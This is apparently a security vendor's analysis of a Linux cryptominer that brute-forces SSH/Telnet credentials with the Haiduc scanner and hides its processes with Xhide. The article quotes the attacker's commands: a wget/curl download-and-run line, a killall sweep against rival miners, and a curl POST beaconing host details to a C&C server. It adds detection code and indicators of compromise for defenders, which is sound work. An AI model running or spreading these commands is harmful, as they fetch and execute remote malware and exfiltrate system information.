Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers
By Augusto Remillano II and Jemimah Molina (Threats Analysts)
A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used by the miner to host the command for downloading the main shell script (detected by Trend Micro as Trojan.SH.MALXMR.UWEJS). The cryptocurrency miner, a multi-component threat made up of different Perl and Bash scripts, miner binaries, the application hider Xhide, and a scanner tool, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials.
Analysis of the threat revealed that the threat actor behind the malicious activity executes component files that run multiple times daily so that the infected machine’s status is regularly sent to the command-and-control server (C&C). The shell script used in the infection is also capable of downloading archived files that contain the miner’s scanner, hider, and final payload.
The threat also employs a process hider to conceal the miner binary, which makes a typical user less likely to notice the mining activity, save for a drop in performance and suspicious network traffic. This method has been a known cover for threat actors that aim to scan, brute force, and mine.
The infection
The attacker starts by gaining access to a machine through weak or default credentials. Then, a command will be run on the compromised machine:
cd /tmp;wget hxxps://upajmeter[.]com/assets/.style/min;curl -O hxxps://upajmeter[.]com/assets/.style/min;chmod +x min;perl min;rm -rf min*
The initial file min (detected as Trojan.Perl.MALXMR.UWEJS) downloads another file, min.sh (detected as Trojan.SH.MALXMR.UWEJS), which is the main shell script that installs the various components of this threat. Once executed, the main shell script tries to kill existing cryptocurrency-mining processes:
killall -9 rand rx rd tsm tsm2 haiduc a sparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr python cron ntpd start start.sh libssl sparky.sh
The shell script also downloads and executes the component file downloaders cron.sh and nano.sh (Trojan.SH.MALXMR.UWEJT), which are executed every hour and every 30 minutes, respectively. These files drop rcmd.sh (detected as Trojan.SH.MALXMR.UWEJU), which regularly reports the status of the infected machine back to the C&C via an HTTP POST request:
curl -d "info=POST&data=SERVER---> $(whoami)@$SERVERIP
DATE---> $(date)
SERV---> $(uname -a) ===> $(nproc) PROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)" hxxp://upajmeter[.]com/assets/.style/remote/info.php > /dev/null
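The three command lines quoted above (the download chain, the killall sweep and the rcmd.sh status report) can be matched in process command-line telemetry. The following Python is an added example, not code from the original analysis; the rule names, the three-name threshold and the sample lines with example.invalid hosts are constructed for illustration.

```python
import re
import shlex

# Distinctive subset of the process names in the killall line quoted above.
KILL_NAMES = {"rand", "rx", "rd", "tsm", "tsm2", "haiduc", "sparky.sh",
              "2238Xae", "minerd", "yam", "xmr", "libssl"}
INTERPRETERS = {"perl", "sh", "bash", "python"}
BEACON_PREFIX = "info=POST&data=SERVER--->"  # start of the rcmd.sh POST body

def _tokens(text):
    try:
        return shlex.split(text)
    except ValueError:  # unbalanced quotes in truncated telemetry
        return text.split()

def _base(arg):
    return arg.rstrip("/").rsplit("/", 1)[-1]

def triage(cmdline):
    """Return the behaviours from the article seen in one shell command line."""
    hits, fetched, ran, removed = set(), set(), set(), set()
    for step in filter(None, map(_tokens, re.split(r";|&&", cmdline))):
        prog, args = _base(step[0]), [a for a in step[1:] if not a.startswith("-")]
        if prog in ("wget", "curl"):
            fetched |= {_base(a) for a in args if "://" in a}
        elif prog in INTERPRETERS:
            ran |= {_base(a) for a in args}
        elif prog == "rm":
            removed |= {_base(a).rstrip("*") for a in args}
        elif prog == "killall" and len(KILL_NAMES & set(args)) >= 3:
            hits.add("kills_rival_miners")
    if fetched & ran & removed:  # same file downloaded, run, then deleted
        hits.add("fetch_run_delete")
    toks = _tokens(cmdline)
    if "curl" in map(_base, toks) and any(f in ("-d", "--data") and
            v.startswith(BEACON_PREFIX) for f, v in zip(toks, toks[1:])):
        hits.add("status_beacon")
    return hits

# Constructed command lines modelled on the commands quoted in the article.
SAMPLES = [
    "cd /tmp;wget https://files.example.invalid/a/min;curl -O https://files.example.invalid/a/min;chmod +x min;perl min;rm -rf min*",
    "killall -9 rand rx rd tsm tsm2 haiduc minerd yam xmr",
    'curl -d "info=POST&data=SERVER---> root@203.0.113.7\nDATE---> (constructed)" http://c2.example.invalid/info.php',
    "curl -O https://mirror.example.invalid/pkg.tar.gz && tar xzf pkg.tar.gz",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(sorted(triage(s)), repr(s[:48]))
```

The last sample is a benign download that is unpacked rather than run and deleted, so it produces no hits.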
The archived files
The shell script is also capable of downloading and extracting the miner archive monero.tgz (detected as Trojan.Linux.MALXMR.UWEJS) for the execution of its contents. The archive file contains the miner binaries, which can be executed by various shell and Perl scripts that are also contained in the file.
The contents of the archive file are primarily configuration files and those that execute various component files, such as config.txt, cpu.txt, h32 (Xhide 32-bit), h64 (Xhide 64-bit), pools.txt, run, startMSR, x, x.pl, xmr-stak, and xmrig. The binary Xhide is responsible for hiding cryptocurrency-mining processes through changing process names into “-bash”.
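Because the hider only changes the name a process reports, a process calling itself -bash can be checked against the binary it actually runs. This is an added example, not part of the original analysis; it assumes the renamed argv[0] is visible in /proc/<pid>/cmdline while /proc/<pid>/exe still resolves to the real executable, and that genuine bash lives at the listed paths. The function name is hypothetical.

```python
import os

# Assumed install paths for the real bash; adjust per distribution.
TRUSTED_BASH = {"/bin/bash", "/usr/bin/bash"}

def masquerading_as_bash(proc_root="/proc"):
    """Return sorted (pid, exe) pairs for processes that report their name as
    "-bash" while /proc/<pid>/exe points somewhere other than a trusted bash."""
    findings = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                argv0 = fh.read().split(b"\0", 1)[0].decode(errors="replace")
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:  # process exited, kernel thread, or not permitted
            continue
        if argv0.strip() != "-bash":
            continue
        # The kernel appends " (deleted)" when the binary was removed after
        # launch; strip it before comparing.
        real = exe[:-len(" (deleted)")] if exe.endswith(" (deleted)") else exe
        if real not in TRUSTED_BASH:
            findings.append((int(pid), exe))
    return sorted(findings)

if __name__ == "__main__":
    for pid, exe in masquerading_as_bash():
        print(f"pid {pid} reports -bash but runs {exe}")
```

Run it as root; otherwise /proc/<pid>/exe of other users' processes is unreadable and those processes are skipped.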
The main shell script then proceeds to download and extract the scanner archive sslm.tgz (detected as Trojan.Linux.SSHBRUTE.UWEJS) for execution. The archive houses the Telnet/SSH scanner binary, the corresponding shell and Perl scripts that will execute it, and the list of passwords that will be used for scanning.
The contents of the scanner archive include .pass (short password list used for random public IP blocks), pass (long password list used for private IP blocks), libssl (the UPX-packed Haiduc scanner), sparky.sh, start, start.pl, and start.sh.
The scanner attempts to infect and gain control of devices in a private IP range (it tries to infect all devices in the same local network as the host machine) by brute forcing them with a list of 3,637 username and password combinations. It also tries to infect devices in the public IP range of {random number from 0-216}.0.0.0/8 by using a different, shorter credentials list. Based on the credentials used, the attack mostly targets servers related to databases, storage, gaming, and mining rigs.
If successful, the attacker will then be able to issue the aforementioned commands for cryptocurrency-mining.
Protecting devices from cryptocurrency-mining threats
The threat actors behind this cryptocurrency-miner have utilized Haiduc and Xhide, known and old tools that have been notoriously used for various malicious activities. These tools, combined with brute-forced weak credentials, can persist in systems while operating under the radar of traditional network security solutions. Such malware can also affect system performance and expose users to other forms of compromise.
While we haven’t seen widespread attacks from this threat actor yet, users should adopt security measures that can defend systems against any potential attacks, such as:
- Taking caution against known attack vectors such as unsolicited emails, socially engineered links and attachments, suspicious websites, and dubious third-party applications
- Changing devices’ default credentials to prevent unauthorized access
- Updating devices with the latest patches
- Regularly verifying that all created accounts are only used for legitimate purposes
Users can also consider adopting security solutions that can provide protection from malicious bot-related activities through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.
Users of the Trend Micro™ Deep Discovery Inspector (DDI) are protected from this threat via these rules, which cover the mining network traffic and C&C connection respectively:
- Rule 2573: MINER - TCP (Request)
- Rule 4313: MALXMR - HTTP (Request)
Indicators of compromise (IoCs)
SHA-256
Filenames | Hashes | Trend Micro Pattern Detection | Notes |
config.txt | 91a80ee885d7586292260750a4129ad305fe252a39002cbde546e8161873a906 | Trojan.Win32.MALXMR.BJ | Config file |
cpu.txt | 60a1f3cf6a6a72e45bfb299839f25e872e016b6e1f9d465477224d0c6bb2d53a | Trojan.Win32.MALXMR.BJ | Config file |
cron.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | Downloads component file |
h32 | 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 | HackTool.Linux.XHide.GA | Xhide binary (32-bit) |
h64 | 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf | HackTool.Linux.XHide.GA | Xhide binary (64-bit) |
libssl | 6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4 | HackTool.Linux.SSHBRUTE.GA | Haiduc scanner (UPX packed) |
min | 07f6e31ffab85fe561c6f39aa3cf62c71017b790ee8eb1b028579ef982e861ab | Trojan.Perl.MALXMR.UWEJS | Downloads the main shell script |
min.sh | 3f36a82e37f8dc885bab158568d0df3b7857b830250fdf32be39a1dadea6f460 | Trojan.SH.MALXMR.UWEJS | Main shell script |
monero.tgz | eb34d838d0b678dcc2f19140dc312680782e011b1b1ecb0f2ec890f5d3943544 | Trojan.Linux.MALXMR.UWEJS | Miner archive |
nano.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | Downloads component file |
pools.txt | cd590e2343810e17d5c96d8db76c11b4e08ad7b3c3ed5424965b9098f0308f57 | Trojan.Win32.MALXMR.BJ | Config file |
rcmd.sh | 46dc8a5ba6f7dc9ce1f51039b434d53bd90bf19314f9c4b4238c23a29230ccff | Trojan.SH.MALXMR.UWEJU | Reports to C&C |
run | 420aeb234ab803ac8e12250ce15c4c63870bbd68f6037ef68655187739429dc1 | Trojan.SH.MALXMR.UWEJW | Executes miner and hider component |
sparky.sh | 64a66a8254b45debc1d0efea6662e240d9832ef0667ce805d2b6aaa8ff90ce18 | Trojan.SH.SSHBRUTE.UWEJS | Executes scanner component |
sslm.tgz | 8cce20ac223b14200e8b1fc23bde114e19bfef5762d461156dad13f22ea25a5f | Trojan.Linux.SSHBRUTE.UWEJS | Scanner archive |
start | 5725edd6ae0a832ec1f474caa78345761db630278459db17434d08876722659b | Trojan.SH.SSHBRUTE.UWEJS | Executes component file |
start.sh | d75bac897dfbdd5ed97775ae30e23a55695868c3e5702f449364400815f6a049 | Trojan.SH.SSHBRUTE.UWEJS | Executes component file |
startMSR | 473b58ed5e8667ff8ab54044ed8b070edb5a227837ffb28b992396dcb4a3aacb | Trojan.SH.MALXMR.UWEJW | Executes miner and hider component |
x | 78ea53a03343b0a471476b8e1f3fae6ef847ad097dd16be4628d650bce353e4d | Trojan.SH.MALXMR.UWEJS | Executes component file |
xmr-stak | 8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c | Coinminer.Linux.MALXMR.UWEKF | Miner binary |
xmrig | e41b2012a4fdc58370f243f3dbb65ee5db12b007919528b0d4bd0d9b0f948abb | Coinminer.Linux.MALXMR.SMDSL64 | Miner binary |
Related malicious URLs